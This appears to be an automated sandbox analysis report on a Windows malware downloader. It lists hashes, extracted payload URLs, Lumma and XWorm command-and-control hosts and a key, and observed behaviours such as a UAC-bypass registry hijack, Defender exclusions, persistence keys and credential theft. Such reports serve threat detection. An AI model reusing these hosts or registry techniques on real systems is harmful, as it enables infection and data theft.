Analysis
-
max time kernel
299s -
max time network
303s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-11-2024 01:49
Static task
static1
Behavioral task
behavioral1
Sample
Downloaders.zip
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.zip
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
New Text Document mod.exse.zip
Resource
win11-20241007-en
Behavioral task
behavioral5
Sample
New Text Document mod.exe
Resource
win11-20241023-en
Behavioral task
behavioral6
Sample
New Text Document mod.exe
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
lumma
https://crib-endanger.sbs
https://faintbl0w.sbs
https://300snails.sbs
https://bored-light.sbs
https://3xc1aimbl0w.sbs
https://pull-trucker.sbs
https://fleez-inc.sbs
https://thicktoys.sbs
https://frogmen-smell.sbs
Extracted
xworm
5.0
68.178.207.33:7000
sSM7p4MT4JctLnRS
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral5/files/0x00070000000259ac-344.dat family_xworm behavioral5/memory/4000-359-0x0000000000700000-0x000000000070E000-memory.dmp family_xworm -
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 4192 created 420 4192 AddInProcess32.exe 49 PID 1560 created 3312 1560 Reynolds.com 52 PID 2656 created 420 2656 rh.exe 49 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rh.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 11 4892 powershell.exe 12 4892 powershell.exe 260 3468 powershell.exe 261 5044 powershell.exe 263 1696 mshta.exe 266 2004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1496 powershell.exe 3144 powershell.exe 1028 powershell.exe 404 powershell.exe 3468 powershell.exe 5044 powershell.exe 2004 powershell.exe 4892 powershell.exe 4368 powershell.exe 1232 powershell.exe 1872 powershell.exe 2688 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe -
Executes dropped EXE 58 IoCs
pid Process 3600 tik-tok-1.0.5.0-installer_iPXA-F1.exe 2332 main_v4.exe 3096 TikTok18.exe 2976 TikTok18.exe 3336 papa_hr_build.exe 4536 papa_hr_build.exe 4948 fHR9z2C.exe 4352 papa_hr_build.exe 1100 papa_hr_build.exe 3840 filer.exe 4588 AmLzNi.exe 2088 Xworm%20V5.6.exe 4000 XClient.exe 2152 333.exe 480 VBVEd6f.exe 1088 test12.exe 2680 test6.exe 2344 test14.exe 2976 pantest.exe 1564 test9.exe 960 test10-29.exe 2708 test19.exe 4396 test10.exe 3868 test_again4.exe 4208 test23.exe 4060 test5.exe 1844 test11.exe 1948 test20.exe 3248 test_again3.exe 5060 test16.exe 1812 test13.exe 4352 test_again2.exe 968 test15.exe 452 test18.exe 2912 test21.exe 896 test22.exe 3260 test8.exe 2836 test7.exe 3360 test-again.exe 4392 test17.exe 4800 vg9qcBa.exe 3764 vg9qcBa.exe 4768 win.exe 2276 x4lburt.exe 1828 computerlead.exe 3764 9758xBqgE1azKnB.exe 1840 7mpPLxE.exe 2264 7mpPLxE.exe 2636 0fVlNye.exe 1560 Reynolds.com 2012 Reynolds.com 2652 IMG001.exe 2656 rh.exe 4912 file.exe 4012 tftp.exe 1684 IMG001.exe 2956 LB31.exe 2916 Mig.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Wine rh.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" win.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" x4lburt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 1 bitbucket.org 3 bitbucket.org 11 bitbucket.org -
pid Process 2780 arp.exe -
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4376 powercfg.exe 2172 powercfg.exe 2580 powercfg.exe 2624 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral5/files/0x000400000002571a-305.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe LB31.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3116 tasklist.exe 4372 tasklist.exe 1884 tasklist.exe 1388 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2656 rh.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3336 set thread context of 4536 3336 papa_hr_build.exe 104 PID 4352 set thread context of 1100 4352 papa_hr_build.exe 131 PID 4800 set thread context of 3764 4800 vg9qcBa.exe 220 PID 1828 set thread context of 4192 1828 computerlead.exe 231 PID 1840 set thread context of 2264 1840 7mpPLxE.exe 238 PID 1560 set thread context of 2012 1560 Reynolds.com 253 PID 2012 set thread context of 1464 2012 Reynolds.com 254 PID 2956 set thread context of 4756 2956 LB31.exe 303 -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\IdeasApp 0fVlNye.exe File opened for modification C:\Windows\JoiningMazda 0fVlNye.exe File opened for modification C:\Windows\UruguayNorthern 0fVlNye.exe File opened for modification C:\Windows\VatBukkake 0fVlNye.exe File opened for modification C:\Windows\DownReceptor 0fVlNye.exe File opened for modification C:\Windows\ComfortSick 0fVlNye.exe File opened for modification C:\Windows\CentralAvoiding 0fVlNye.exe File opened for modification C:\Windows\MozambiqueAppropriate 0fVlNye.exe File opened for modification C:\Windows\TeddySecretariat 0fVlNye.exe File opened for modification C:\Windows\OrganDiscretion 0fVlNye.exe File opened for modification C:\Windows\KeyboardsTwin 0fVlNye.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4540 sc.exe 4888 sc.exe 3948 sc.exe 5096 sc.exe 3584 sc.exe 1384 sc.exe 4988 sc.exe 2496 sc.exe 3256 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 4 IoCs
pid pid_target Process procid_target 1896 3336 WerFault.exe 103 4868 4352 WerFault.exe 130 8 4192 WerFault.exe 231 2400 2656 WerFault.exe 260 -
System Location Discovery: System Language Discovery 1 TTPs 60 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vg9qcBa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vg9qcBa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TikTok18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language route.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VBVEd6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7mpPLxE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0fVlNye.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 333.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7mpPLxE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language win.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9758xBqgE1azKnB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tik-tok-1.0.5.0-installer_iPXA-F1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language arp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language computerlead.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TikTok18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main_v4.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral5/files/0x0002000000025cdc-649.dat nsis_installer_2 behavioral5/files/0x0005000000025ce7-1748.dat nsis_installer_1 behavioral5/files/0x0005000000025ce7-1748.dat nsis_installer_2 -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5116 wmic.exe 3428 wmic.exe 4844 wmic.exe -
Kills process with taskkill 2 IoCs
pid Process 2408 taskkill.exe 2732 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 34 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4911.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2998.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\2510.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 main_v4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b